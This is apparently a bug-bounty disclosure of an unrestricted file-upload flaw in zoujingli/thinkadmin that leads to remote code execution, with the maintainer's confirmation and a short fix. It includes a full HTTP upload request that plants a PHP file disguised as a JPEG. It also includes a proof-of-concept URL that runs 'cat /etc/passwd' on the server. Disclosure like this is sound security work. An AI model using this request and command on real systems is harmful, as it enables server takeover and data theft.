Code Injection in zoujingli/thinkadmin

Valid

Reported on

Sep 15th 2021


Description

remote code execution

Proof of Concept

Bellow request is vulnerable to arbitary system command injection .
During file upload it does not properly check file upload which allow to upload php file and this php file will execute system command

POST /admin/api.upload/file.html HTTP/2
Host: v6.thinkadmin.top
Cookie: lang=zh-cn; PHPSESSID=88a2945fb139bb74f87137d2144709ab; limit=20
Content-Length: 14171
Sec-Ch-Ua: "Google Chrome";v="93", " Not;A Brand";v="99", "Chromium";v="93"
Accept: text/plain, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAn0D7Qsi6kRX5BBr
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Origin: https://v6.thinkadmin.top
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://v6.thinkadmin.top/admin.html
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

------WebKitFormBoundaryAn0D7Qsi6kRX5BBr
Content-Disposition: form-data; name="key"

e4/949bdb5f9077bfed982ca9b7bfadbd.php?.jpg
------WebKitFormBoundaryAn0D7Qsi6kRX5BBr
Content-Disposition: form-data; name="safe"

0
------WebKitFormBoundaryAn0D7Qsi6kRX5BBr
Content-Disposition: form-data; name="uptype"

local
------WebKitFormBoundaryAn0D7Qsi6kRX5BBr
Content-Disposition: form-data; name="file"; filename="aaa.jpg"
Content-Type: image/jpeg

ÿØÿà

POC

open url https://v6.thinkadmin.top//upload//e4//949bdb5f9077bfed982ca9b7bfadbd.php?id=cat%20/etc/passwd and see it execute system command and print content of /etc/passwd file

VIDEO

https://drive.google.com/file/d/1zlJHrL74emP3evk6bP9sZkSJ4xvBHOa9/view?usp=sharing

Impact

remote code execution

We have contacted a member of the zoujingli/thinkadmin team and are waiting to hear back a year ago
邹景立 validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
邹景立 confirmed that a fix has been merged on 0bf173 a year ago
邹景立 has been awarded the fix bounty
邹景立
a year ago

Maintainer


Resolve file suffix:

pathinfo(parse_url($saveName, PHP_URL_PATH), PATHINFO_EXTENSION)

to join this conversation